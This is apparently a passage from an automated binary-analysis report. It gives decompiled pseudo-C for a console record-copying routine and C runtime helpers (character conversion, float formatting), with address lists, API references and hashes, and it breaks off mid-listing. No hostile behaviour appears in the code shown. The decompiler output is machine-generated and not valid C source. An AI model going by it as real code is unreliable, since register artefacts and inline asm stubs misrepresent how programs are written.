                                                                      										__eax = E00BE15D0();
                                                                      										 *(__ebp - 8) = 0;
                                                                      										 *(__ebp - 0xc) = 0;
                                                                      										while(1) {
                                                                      											L27:
                                                                      											__ecx =  *(__ebp - 8);
                                                                      											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                                      											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                                      												break;
                                                                      											}
                                                                      											L28:
                                                                      											__edx = __ebp - 0x58;
                                                                      											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                                      											__ecx =  *(__ebp - 0x18);
                                                                      											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
                                                                      											__eax = E00BE8230( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
                                                                      											__eflags = __eax;
                                                                      											if(__eax == 0) {
                                                                      												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                                      												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                                      												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                                      												__ecx = 0x11;
                                                                      												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                                      												__edi = __esi + __ecx;
                                                                      												__edi = __esi + __ecx + __ecx;
                                                                      												__ecx = 0;
                                                                      												asm("movsb");
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												__eax = 1 +  *(__ebp - 0xc);
                                                                      												__eflags = __eax;
                                                                      												 *(__ebp - 0xc) = __eax;
                                                                      											}
                                                                      											__eax =  *(__ebp - 8);
                                                                      											__eax = 1 +  *(__ebp - 8);
                                                                      											__eflags = __eax;
                                                                      											 *(__ebp - 8) = __eax;
                                                                      										}
                                                                      										L31:
                                                                      										__ecx =  *(__ebp - 0xc);
                                                                      										 *(__ebp - 0x14) = __ecx;
                                                                      										goto L39;
                                                                      									case 2:
                                                                      										L32:
                                                                      										 *(__ebp - 8) = 0;
                                                                      										while(1) {
                                                                      											L34:
                                                                      											__eax =  *(__ebp - 8);
                                                                      											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                                      											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                                      												break;
                                                                      											}
                                                                      											L35:
                                                                      											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                                      											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                                      											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                                      											__ecx = 0x11;
                                                                      											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                                      											__edi = __esi + __ecx;
                                                                      											__edi = __esi + __ecx + __ecx;
                                                                      											__ecx = 0;
                                                                      											asm("movsb");
                                                                      											__ecx =  *(__ebp - 0xc);
                                                                      											__ecx = 1 +  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0xc) = __ecx;
                                                                      											__edx =  *(__ebp - 8);
                                                                      											__edx = 1 +  *(__ebp - 8);
                                                                      											__eflags = __edx;
                                                                      											 *(__ebp - 8) = __edx;
                                                                      										}
                                                                      										L36:
                                                                      										__edx =  *(__ebp - 0xc);
                                                                      										 *(__ebp - 0x14) =  *(__ebp - 0xc);
                                                                      										L39:
                                                                      										__eflags =  *(_t433 - 0x14);
                                                                      										if(__eflags == 0) {
                                                                      											E00BE20E0(_t322, _t397, _t421, __eflags, _t457);
                                                                      											E00BE12B0(0x1b, 0xc);
                                                                      											_push(0xbff918);
                                                                      											E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      											_t435 = _t435 + 4;
                                                                      											_t249 = E00BE2E80(_t314, _t365, __eflags, _t457);
                                                                      										}
                                                                      										__eflags =  *(_t433 - 0x28);
                                                                      										if( *(_t433 - 0x28) != 0) {
                                                                      											L85:
                                                                      											 *(_t433 - 0x28) = 0;
                                                                      										} else {
                                                                      											L42:
                                                                      											 *(_t433 - 8) = 0;
                                                                      											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
                                                                      											while(1) {
                                                                      												L44:
                                                                      												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                                      													break;
                                                                      												}
                                                                      												L45:
                                                                      												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                                      												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                                      												_t435 = _t435 + 0xc;
                                                                      												_t397 = _t421 + 0x22;
                                                                      												asm("movsb");
                                                                      												_t322 = 1 +  *(_t433 - 8);
                                                                      												 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                                      												_t391 =  *(_t433 - 0xc) - 1;
                                                                      												__eflags = _t391;
                                                                      												 *(_t433 - 0xc) = _t391;
                                                                      											}
                                                                      											L46:
                                                                      											 *(_t433 - 8) = 0;
                                                                      											while(1) {
                                                                      												L48:
                                                                      												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      												if(__eflags >= 0) {
                                                                      													goto L50;
                                                                      												}
                                                                      												L49:
                                                                      												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                                      												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                                      												_t435 = _t435 + 0xc;
                                                                      												_t397 = _t421 + 0x22;
                                                                      												asm("movsb");
                                                                      												L47:
                                                                      												_t322 = 1 +  *(_t433 - 8);
                                                                      												__eflags = _t322;
                                                                      												 *(_t433 - 8) = _t322;
                                                                      											}
                                                                      											goto L50;
                                                                      										}
                                                                      										goto L86;
                                                                      									case 3:
                                                                      										L37:
                                                                      										goto L87;
                                                                      								}
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						L87:
                                                                      						return _t249;
                                                                      						L88:
                                                                      					}
                                                                      				}
                                                                      			}

































                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be3481
                                                                      0x00be348a
                                                                      0x00be348d
                                                                      0x00be348d
                                                                      0x00be3490
                                                                      0x00be3493
                                                                      0x00be3493
                                                                      0x00be3499
                                                                      0x00be34a2
                                                                      0x00be34ad
                                                                      0x00be34ae
                                                                      0x00be34b3
                                                                      0x00be34cc
                                                                      0x00be34e2
                                                                      0x00be34f0
                                                                      0x00be34f5
                                                                      0x00be34fa
                                                                      0x00be34fd
                                                                      0x00be3500
                                                                      0x00be3505
                                                                      0x00be3505
                                                                      0x00be350b
                                                                      0x00be350f
                                                                      0x00be3510
                                                                      0x00be3510
                                                                      0x00be3515
                                                                      0x00be351e
                                                                      0x00be352c
                                                                      0x00be3530
                                                                      0x00be353a
                                                                      0x00be353e
                                                                      0x00be3548
                                                                      0x00be354c
                                                                      0x00be3556
                                                                      0x00be355a
                                                                      0x00be355b
                                                                      0x00be3560
                                                                      0x00be3565
                                                                      0x00be356e
                                                                      0x00be3571
                                                                      0x00be357e
                                                                      0x00000000
                                                                      0x00be3573
                                                                      0x00be3573
                                                                      0x00be3579
                                                                      0x00be3579
                                                                      0x00be3583
                                                                      0x00be3583
                                                                      0x00be3587
                                                                      0x00be358a
                                                                      0x00be3595
                                                                      0x00be3595
                                                                      0x00be358c
                                                                      0x00be358c
                                                                      0x00be3590
                                                                      0x00be3593
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3593
                                                                      0x00be359c
                                                                      0x00be35a0
                                                                      0x00be35a3
                                                                      0x00be35a5
                                                                      0x00be35a8
                                                                      0x00be35ab
                                                                      0x00be35ad
                                                                      0x00be35ad
                                                                      0x00be35ab
                                                                      0x00be35b4
                                                                      0x00be35b8
                                                                      0x00be35bb
                                                                      0x00be3361
                                                                      0x00be3361
                                                                      0x00be3366
                                                                      0x00be336a
                                                                      0x00be3388
                                                                      0x00be338d
                                                                      0x00be3392
                                                                      0x00be3397
                                                                      0x00be336c
                                                                      0x00be3370
                                                                      0x00be3375
                                                                      0x00be337a
                                                                      0x00be337f
                                                                      0x00be337f
                                                                      0x00be339a
                                                                      0x00be339e
                                                                      0x00be33a3
                                                                      0x00be33a8
                                                                      0x00be33ad
                                                                      0x00be33b4
                                                                      0x00be33b9
                                                                      0x00be33cb
                                                                      0x00be33cb
                                                                      0x00be33cb
                                                                      0x00be33cf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be33d1
                                                                      0x00be33d1
                                                                      0x00be33d6
                                                                      0x00be33db
                                                                      0x00be33e0
                                                                      0x00be33c2
                                                                      0x00be33c5
                                                                      0x00be33c5
                                                                      0x00be33c8
                                                                      0x00be33c8
                                                                      0x00be33e5
                                                                      0x00be33e5
                                                                      0x00be33e9
                                                                      0x00be33eb
                                                                      0x00be33f1
                                                                      0x00be33ff
                                                                      0x00be33ff
                                                                      0x00be33ff
                                                                      0x00be3403
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3405
                                                                      0x00be340b
                                                                      0x00be3422
                                                                      0x00be3422
                                                                      0x00be3422
                                                                      0x00be3424
                                                                      0x00be33f6
                                                                      0x00be33f9
                                                                      0x00be33f9
                                                                      0x00be33fc
                                                                      0x00be33fc
                                                                      0x00be3427
                                                                      0x00be3427
                                                                      0x00be3439
                                                                      0x00be3439
                                                                      0x00be343c
                                                                      0x00be343f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3441
                                                                      0x00be3447
                                                                      0x00be3458
                                                                      0x00be3458
                                                                      0x00be3458
                                                                      0x00be345a
                                                                      0x00be3430
                                                                      0x00be3433
                                                                      0x00be3433
                                                                      0x00be3436
                                                                      0x00be3436
                                                                      0x00be3439
                                                                      0x00be345d
                                                                      0x00be3460
                                                                      0x00be3463
                                                                      0x00be3465
                                                                      0x00be3465
                                                                      0x00be346c
                                                                      0x00be346f
                                                                      0x00be3472
                                                                      0x00be348d
                                                                      0x00be3490
                                                                      0x00be3493
                                                                      0x00be3493
                                                                      0x00000000
                                                                      0x00be3493
                                                                      0x00be35c1
                                                                      0x00be35c1
                                                                      0x00be35c5
                                                                      0x00be35c8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be35ce
                                                                      0x00be35ce
                                                                      0x00be35d2
                                                                      0x00be35d5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be35db
                                                                      0x00be35e4
                                                                      0x00be35e4
                                                                      0x00be35e9
                                                                      0x00be35eb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2ee9
                                                                      0x00be2ee9
                                                                      0x00be2ef0
                                                                      0x00be2ef7
                                                                      0x00be2efe
                                                                      0x00be2f0f
                                                                      0x00be2f14
                                                                      0x00be2f17
                                                                      0x00be2f1c
                                                                      0x00be2f1c
                                                                      0x00be2f29
                                                                      0x00be2f37
                                                                      0x00be2f45
                                                                      0x00be2f55
                                                                      0x00be2f5c
                                                                      0x00be2f61
                                                                      0x00be2f67
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2f69
                                                                      0x00be2f73
                                                                      0x00be2f78
                                                                      0x00be2f7b
                                                                      0x00be2f80
                                                                      0x00be2f80
                                                                      0x00be2f83
                                                                      0x00be2f87
                                                                      0x00be2f91
                                                                      0x00be2f98
                                                                      0x00be2f9d
                                                                      0x00be2fa3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2fa5
                                                                      0x00be2fb3
                                                                      0x00be2fb8
                                                                      0x00be2fbd
                                                                      0x00be2fc5
                                                                      0x00be2fc5
                                                                      0x00be2fc8
                                                                      0x00be2fca
                                                                      0x00be2fca
                                                                      0x00be2fcf
                                                                      0x00be2fd0
                                                                      0x00be2fd5
                                                                      0x00be2fd5
                                                                      0x00be2fdd
                                                                      0x00be2fe0
                                                                      0x00be2fe3
                                                                      0x00be2fe9
                                                                      0x00be2fea
                                                                      0x00be2ff2
                                                                      0x00be2ffb
                                                                      0x00be3000
                                                                      0x00be3005
                                                                      0x00be3011
                                                                      0x00be3016
                                                                      0x00be301b
                                                                      0x00be3027
                                                                      0x00be302c
                                                                      0x00be3031
                                                                      0x00be303d
                                                                      0x00be3042
                                                                      0x00be3047
                                                                      0x00be304c
                                                                      0x00be3053
                                                                      0x00be3058
                                                                      0x00be306a
                                                                      0x00be306a
                                                                      0x00be306a
                                                                      0x00be306e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3070
                                                                      0x00be3070
                                                                      0x00be3075
                                                                      0x00be307a
                                                                      0x00be3064
                                                                      0x00be3064
                                                                      0x00be3067
                                                                      0x00be3067
                                                                      0x00be307f
                                                                      0x00be3083
                                                                      0x00be3088
                                                                      0x00be308d
                                                                      0x00be3092
                                                                      0x00be3095
                                                                      0x00be309c
                                                                      0x00be309f
                                                                      0x00be30a2
                                                                      0x00be30ab
                                                                      0x00be30b4
                                                                      0x00be30b7
                                                                      0x00be30bb
                                                                      0x00be327b
                                                                      0x00be327b
                                                                      0x00be3284
                                                                      0x00be3289
                                                                      0x00be328e
                                                                      0x00be329a
                                                                      0x00be329f
                                                                      0x00be32a4
                                                                      0x00be32a9
                                                                      0x00be32ac
                                                                      0x00000000
                                                                      0x00be30c1
                                                                      0x00be30c1
                                                                      0x00be30c4
                                                                      0x00000000
                                                                      0x00be30cb
                                                                      0x00be30cf
                                                                      0x00be30d4
                                                                      0x00be30d9
                                                                      0x00be30e1
                                                                      0x00be30ea
                                                                      0x00be30ef
                                                                      0x00be30f2
                                                                      0x00be3104
                                                                      0x00be3104
                                                                      0x00be3107
                                                                      0x00be310a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be310c
                                                                      0x00be3119
                                                                      0x00be311e
                                                                      0x00be3123
                                                                      0x00be3126
                                                                      0x00be3128
                                                                      0x00be3130
                                                                      0x00be3141
                                                                      0x00be3141
                                                                      0x00be3141
                                                                      0x00be3143
                                                                      0x00be3147
                                                                      0x00be3147
                                                                      0x00be314a
                                                                      0x00be314a
                                                                      0x00be30fe
                                                                      0x00be30fe
                                                                      0x00be3101
                                                                      0x00be3101
                                                                      0x00be314f
                                                                      0x00be314f
                                                                      0x00be3152
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be315a
                                                                      0x00be315a
                                                                      0x00be315e
                                                                      0x00be3163
                                                                      0x00be3168
                                                                      0x00be316d
                                                                      0x00be3170
                                                                      0x00be3181
                                                                      0x00be318a
                                                                      0x00be318c
                                                                      0x00be3196
                                                                      0x00be319b
                                                                      0x00be31a0
                                                                      0x00be31a5
                                                                      0x00be31a5
                                                                      0x00be31a8
                                                                      0x00be31b1
                                                                      0x00be31b1
                                                                      0x00be31b5
                                                                      0x00be31b8
                                                                      0x00be31b9
                                                                      0x00be31be
                                                                      0x00be31c5
                                                                      0x00be31d7
                                                                      0x00be31d7
                                                                      0x00be31d7
                                                                      0x00be31da
                                                                      0x00be31dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be31df
                                                                      0x00be31df
                                                                      0x00be31e6
                                                                      0x00be31e9
                                                                      0x00be31ec
                                                                      0x00be31f1
                                                                      0x00be31f9
                                                                      0x00be31fb
                                                                      0x00be3200
                                                                      0x00be3203
                                                                      0x00be3209
                                                                      0x00be320c
                                                                      0x00be320f
                                                                      0x00be3214
                                                                      0x00be3214
                                                                      0x00be3214
                                                                      0x00be3214
                                                                      0x00be3216
                                                                      0x00be3217
                                                                      0x00be321a
                                                                      0x00be321a
                                                                      0x00be321d
                                                                      0x00be321d
                                                                      0x00be31ce
                                                                      0x00be31d1
                                                                      0x00be31d1
                                                                      0x00be31d4
                                                                      0x00be31d4
                                                                      0x00be3222
                                                                      0x00be3222
                                                                      0x00be3225
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be322d
                                                                      0x00be322d
                                                                      0x00be323f
                                                                      0x00be323f
                                                                      0x00be323f
                                                                      0x00be3242
                                                                      0x00be3245
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3247
                                                                      0x00be324a
                                                                      0x00be324d
                                                                      0x00be3253
                                                                      0x00be3256
                                                                      0x00be3259
                                                                      0x00be325e
                                                                      0x00be325e
                                                                      0x00be325e
                                                                      0x00be325e
                                                                      0x00be3260
                                                                      0x00be3261
                                                                      0x00be3264
                                                                      0x00be3267
                                                                      0x00be3236
                                                                      0x00be3239
                                                                      0x00be3239
                                                                      0x00be323c
                                                                      0x00be323c
                                                                      0x00be326c
                                                                      0x00be326c
                                                                      0x00be326f
                                                                      0x00be32b3
                                                                      0x00be32b3
                                                                      0x00be32b7
                                                                      0x00be32b9
                                                                      0x00be32c2
                                                                      0x00be32c7
                                                                      0x00be32cc
                                                                      0x00be32d1
                                                                      0x00be32d4
                                                                      0x00be32d4
                                                                      0x00be32d9
                                                                      0x00be32dd
                                                                      0x00be35dd
                                                                      0x00be35dd
                                                                      0x00be32e3
                                                                      0x00be32e3
                                                                      0x00be32e3
                                                                      0x00be32f0
                                                                      0x00be3307
                                                                      0x00be3307
                                                                      0x00be330a
                                                                      0x00be330d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be330f
                                                                      0x00be3315
                                                                      0x00be3326
                                                                      0x00be3326
                                                                      0x00be3326
                                                                      0x00be3328
                                                                      0x00be32f8
                                                                      0x00be32fb
                                                                      0x00be3301
                                                                      0x00be3301
                                                                      0x00be3304
                                                                      0x00be3304
                                                                      0x00be332b
                                                                      0x00be332b
                                                                      0x00be333d
                                                                      0x00be333d
                                                                      0x00be3340
                                                                      0x00be3343
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3345
                                                                      0x00be334b
                                                                      0x00be335c
                                                                      0x00be335c
                                                                      0x00be335c
                                                                      0x00be335e
                                                                      0x00be3334
                                                                      0x00be3337
                                                                      0x00be3337
                                                                      0x00be333a
                                                                      0x00be333a
                                                                      0x00000000
                                                                      0x00be333d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3274
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be30c4
                                                                      0x00000000
                                                                      0x00be30bb
                                                                      0x00be35f1
                                                                      0x00be35f6
                                                                      0x00000000
                                                                      0x00be35f6
                                                                      0x00be348d

                                                                      APIs
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE34B3
                                                                      • _wprintf.LIBCMT ref: 00BE3560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$ConsoleCursorHandlePosition
                                                                      • String ID: %d.$%s%s%s%s
                                                                      • API String ID: 3459578117-4028964860
                                                                      • Opcode ID: 48f1cb2662f3ec175bcd719e6b40cb5be39662b640770e5e79cb533934b9bf89
                                                                      • Instruction ID: bfaa49e2e156f19d65c573f7387cc5a3d55abaea1756db52e0f9338b6c5da602
                                                                      • Opcode Fuzzy Hash: 48f1cb2662f3ec175bcd719e6b40cb5be39662b640770e5e79cb533934b9bf89
                                                                      • Instruction Fuzzy Hash: 01417171E0408AAFCF18CB89C4D5ABEBBF6EFA1704F5581D9D001AB346DB349A45CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E00BF1673(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v20;
                                                                      				void* __edi;
                                                                      				signed int _t35;
                                                                      				int _t38;
                                                                      				intOrPtr* _t44;
                                                                      				int _t47;
                                                                      				short* _t49;
                                                                      				intOrPtr _t50;
                                                                      				intOrPtr _t54;
                                                                      				int _t55;
                                                                      				void* _t57;
                                                                      				signed int _t59;
                                                                      				char* _t62;
                                                                      
                                                                      				_t62 = _a8;
                                                                      				if(_t62 == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				}
                                                                      				_t50 = _a12;
                                                                      				if(_t50 == 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				if( *_t62 != 0) {
                                                                      					_push(_t57);
                                                                      					E00BE7857( &_v20, _t57, _a16);
                                                                      					_t35 = _v20;
                                                                      					__eflags =  *(_t35 + 0xa8);
                                                                      					if( *(_t35 + 0xa8) != 0) {
                                                                      						_t38 = E00BF124B( *_t62 & 0x000000ff,  &_v20);
                                                                      						__eflags = _t38;
                                                                      						if(_t38 == 0) {
                                                                      							__eflags = _a4;
                                                                      							_t59 = 1;
                                                                      							_t28 = _v20 + 4; // 0x20432f41
                                                                      							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                      							if(__eflags != 0) {
                                                                      								L21:
                                                                      								__eflags = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									_t54 = _v12;
                                                                      									_t31 = _t54 + 0x70;
                                                                      									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                      									__eflags =  *_t31;
                                                                      								}
                                                                      								return _t59;
                                                                      							}
                                                                      							L20:
                                                                      							_t44 = E00BE8EFF(__eflags);
                                                                      							_t59 = _t59 | 0xffffffff;
                                                                      							__eflags = _t59;
                                                                      							 *_t44 = 0x2a;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t59 = _v20;
                                                                      						__eflags =  *(_t59 + 0x74) - 1;
                                                                      						if( *(_t59 + 0x74) <= 1) {
                                                                      							L15:
                                                                      							_t20 = _t59 + 0x74; // 0x3a202020
                                                                      							__eflags = _t50 -  *_t20;
                                                                      							L16:
                                                                      							if(__eflags < 0) {
                                                                      								goto L20;
                                                                      							}
                                                                      							__eflags = _t62[1];
                                                                      							if(__eflags == 0) {
                                                                      								goto L20;
                                                                      							}
                                                                      							L18:
                                                                      							_t22 = _t59 + 0x74; // 0x3a202020
                                                                      							_t59 =  *_t22;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t12 = _t59 + 0x74; // 0x3a202020
                                                                      						__eflags = _t50 -  *_t12;
                                                                      						if(__eflags < 0) {
                                                                      							goto L16;
                                                                      						}
                                                                      						__eflags = _a4;
                                                                      						_t17 = _t59 + 0x74; // 0x3a202020
                                                                      						_t18 = _t59 + 4; // 0x20432f41
                                                                      						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                                      						_t59 = _v20;
                                                                      						__eflags = _t47;
                                                                      						if(_t47 != 0) {
                                                                      							goto L18;
                                                                      						}
                                                                      						goto L15;
                                                                      					}
                                                                      					_t55 = _a4;
                                                                      					__eflags = _t55;
                                                                      					if(_t55 != 0) {
                                                                      						 *_t55 =  *_t62 & 0x000000ff;
                                                                      					}
                                                                      					_t59 = 1;
                                                                      					goto L21;
                                                                      				}
                                                                      				_t49 = _a4;
                                                                      				if(_t49 != 0) {
                                                                      					 *_t49 = 0;
                                                                      				}
                                                                      				goto L5;
                                                                      			}


















                                                                      0x00bf167b
                                                                      0x00bf1680
                                                                      0x00bf169a
                                                                      0x00000000
                                                                      0x00bf169a
                                                                      0x00bf1682
                                                                      0x00bf1687
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf168c
                                                                      0x00bf16a0
                                                                      0x00bf16a7
                                                                      0x00bf16ac
                                                                      0x00bf16af
                                                                      0x00bf16b6
                                                                      0x00bf16d5
                                                                      0x00bf16dc
                                                                      0x00bf16de
                                                                      0x00bf1722
                                                                      0x00bf172a
                                                                      0x00bf1736
                                                                      0x00bf173f
                                                                      0x00bf1741
                                                                      0x00bf1751
                                                                      0x00bf1751
                                                                      0x00bf1755
                                                                      0x00bf1757
                                                                      0x00bf175a
                                                                      0x00bf175a
                                                                      0x00bf175a
                                                                      0x00bf175a
                                                                      0x00000000
                                                                      0x00bf1760
                                                                      0x00bf1743
                                                                      0x00bf1743
                                                                      0x00bf1748
                                                                      0x00bf1748
                                                                      0x00bf174b
                                                                      0x00000000
                                                                      0x00bf174b
                                                                      0x00bf16e0
                                                                      0x00bf16e3
                                                                      0x00bf16e7
                                                                      0x00bf1710
                                                                      0x00bf1710
                                                                      0x00bf1710
                                                                      0x00bf1713
                                                                      0x00bf1713
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf1715
                                                                      0x00bf1719
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf171b
                                                                      0x00bf171b
                                                                      0x00bf171b
                                                                      0x00000000
                                                                      0x00bf171b
                                                                      0x00bf16e9
                                                                      0x00bf16e9
                                                                      0x00bf16ec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf16f0
                                                                      0x00bf16fa
                                                                      0x00bf1700
                                                                      0x00bf1703
                                                                      0x00bf1709
                                                                      0x00bf170c
                                                                      0x00bf170e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf170e
                                                                      0x00bf16b8
                                                                      0x00bf16bb
                                                                      0x00bf16bd
                                                                      0x00bf16c2
                                                                      0x00bf16c2
                                                                      0x00bf16c7
                                                                      0x00000000
                                                                      0x00bf16c7
                                                                      0x00bf168e
                                                                      0x00bf1693
                                                                      0x00bf1697
                                                                      0x00bf1697
                                                                      0x00000000

                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BF16A7
                                                                      • __isleadbyte_l.LIBCMT ref: 00BF16D5
                                                                      • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,00BFFF04,?,00000000), ref: 00BF1703
                                                                      • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,00BFFF04,?,00000000), ref: 00BF1739
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: e8f4e2db75c397ea82c7c1d4d654881dba61afbfdff06fdbc2f5676a43a598f2
                                                                      • Instruction ID: 51db18793842eefa3d5f04ebf9d2e8099abea16bbfa12566ee55c1c2d043c937
                                                                      • Opcode Fuzzy Hash: e8f4e2db75c397ea82c7c1d4d654881dba61afbfdff06fdbc2f5676a43a598f2
                                                                      • Instruction Fuzzy Hash: E331AD7160024AEFDB219E79C844BBA7BE5FF41350F194CA8E568D71A0EB30EC59DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00BEECB1(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				intOrPtr _t25;
                                                                      				void* _t26;
                                                                      
                                                                      				_t25 = _a16;
                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                      					_t26 = E00BEF1FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      					goto L9;
                                                                      				} else {
                                                                      					_t35 = _t25 - 0x66;
                                                                      					if(_t25 != 0x66) {
                                                                      						__eflags = _t25 - 0x61;
                                                                      						if(_t25 == 0x61) {
                                                                      							L7:
                                                                      							_t26 = E00BEED37(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                      						} else {
                                                                      							__eflags = _t25 - 0x41;
                                                                      							if(__eflags == 0) {
                                                                      								goto L7;
                                                                      							} else {
                                                                      								_t26 = E00BEF473(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      							}
                                                                      						}
                                                                      						L9:
                                                                      						return _t26;
                                                                      					} else {
                                                                      						return E00BEF3B4(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                      					}
                                                                      				}
                                                                      			}





                                                                      0x00beecb4
                                                                      0x00beecba
                                                                      0x00beed2d
                                                                      0x00000000
                                                                      0x00beecc1
                                                                      0x00beecc1
                                                                      0x00beecc4
                                                                      0x00beecdf
                                                                      0x00beece2
                                                                      0x00beed02
                                                                      0x00beed14
                                                                      0x00beece4
                                                                      0x00beece4
                                                                      0x00beece7
                                                                      0x00000000
                                                                      0x00beece9
                                                                      0x00beecfb
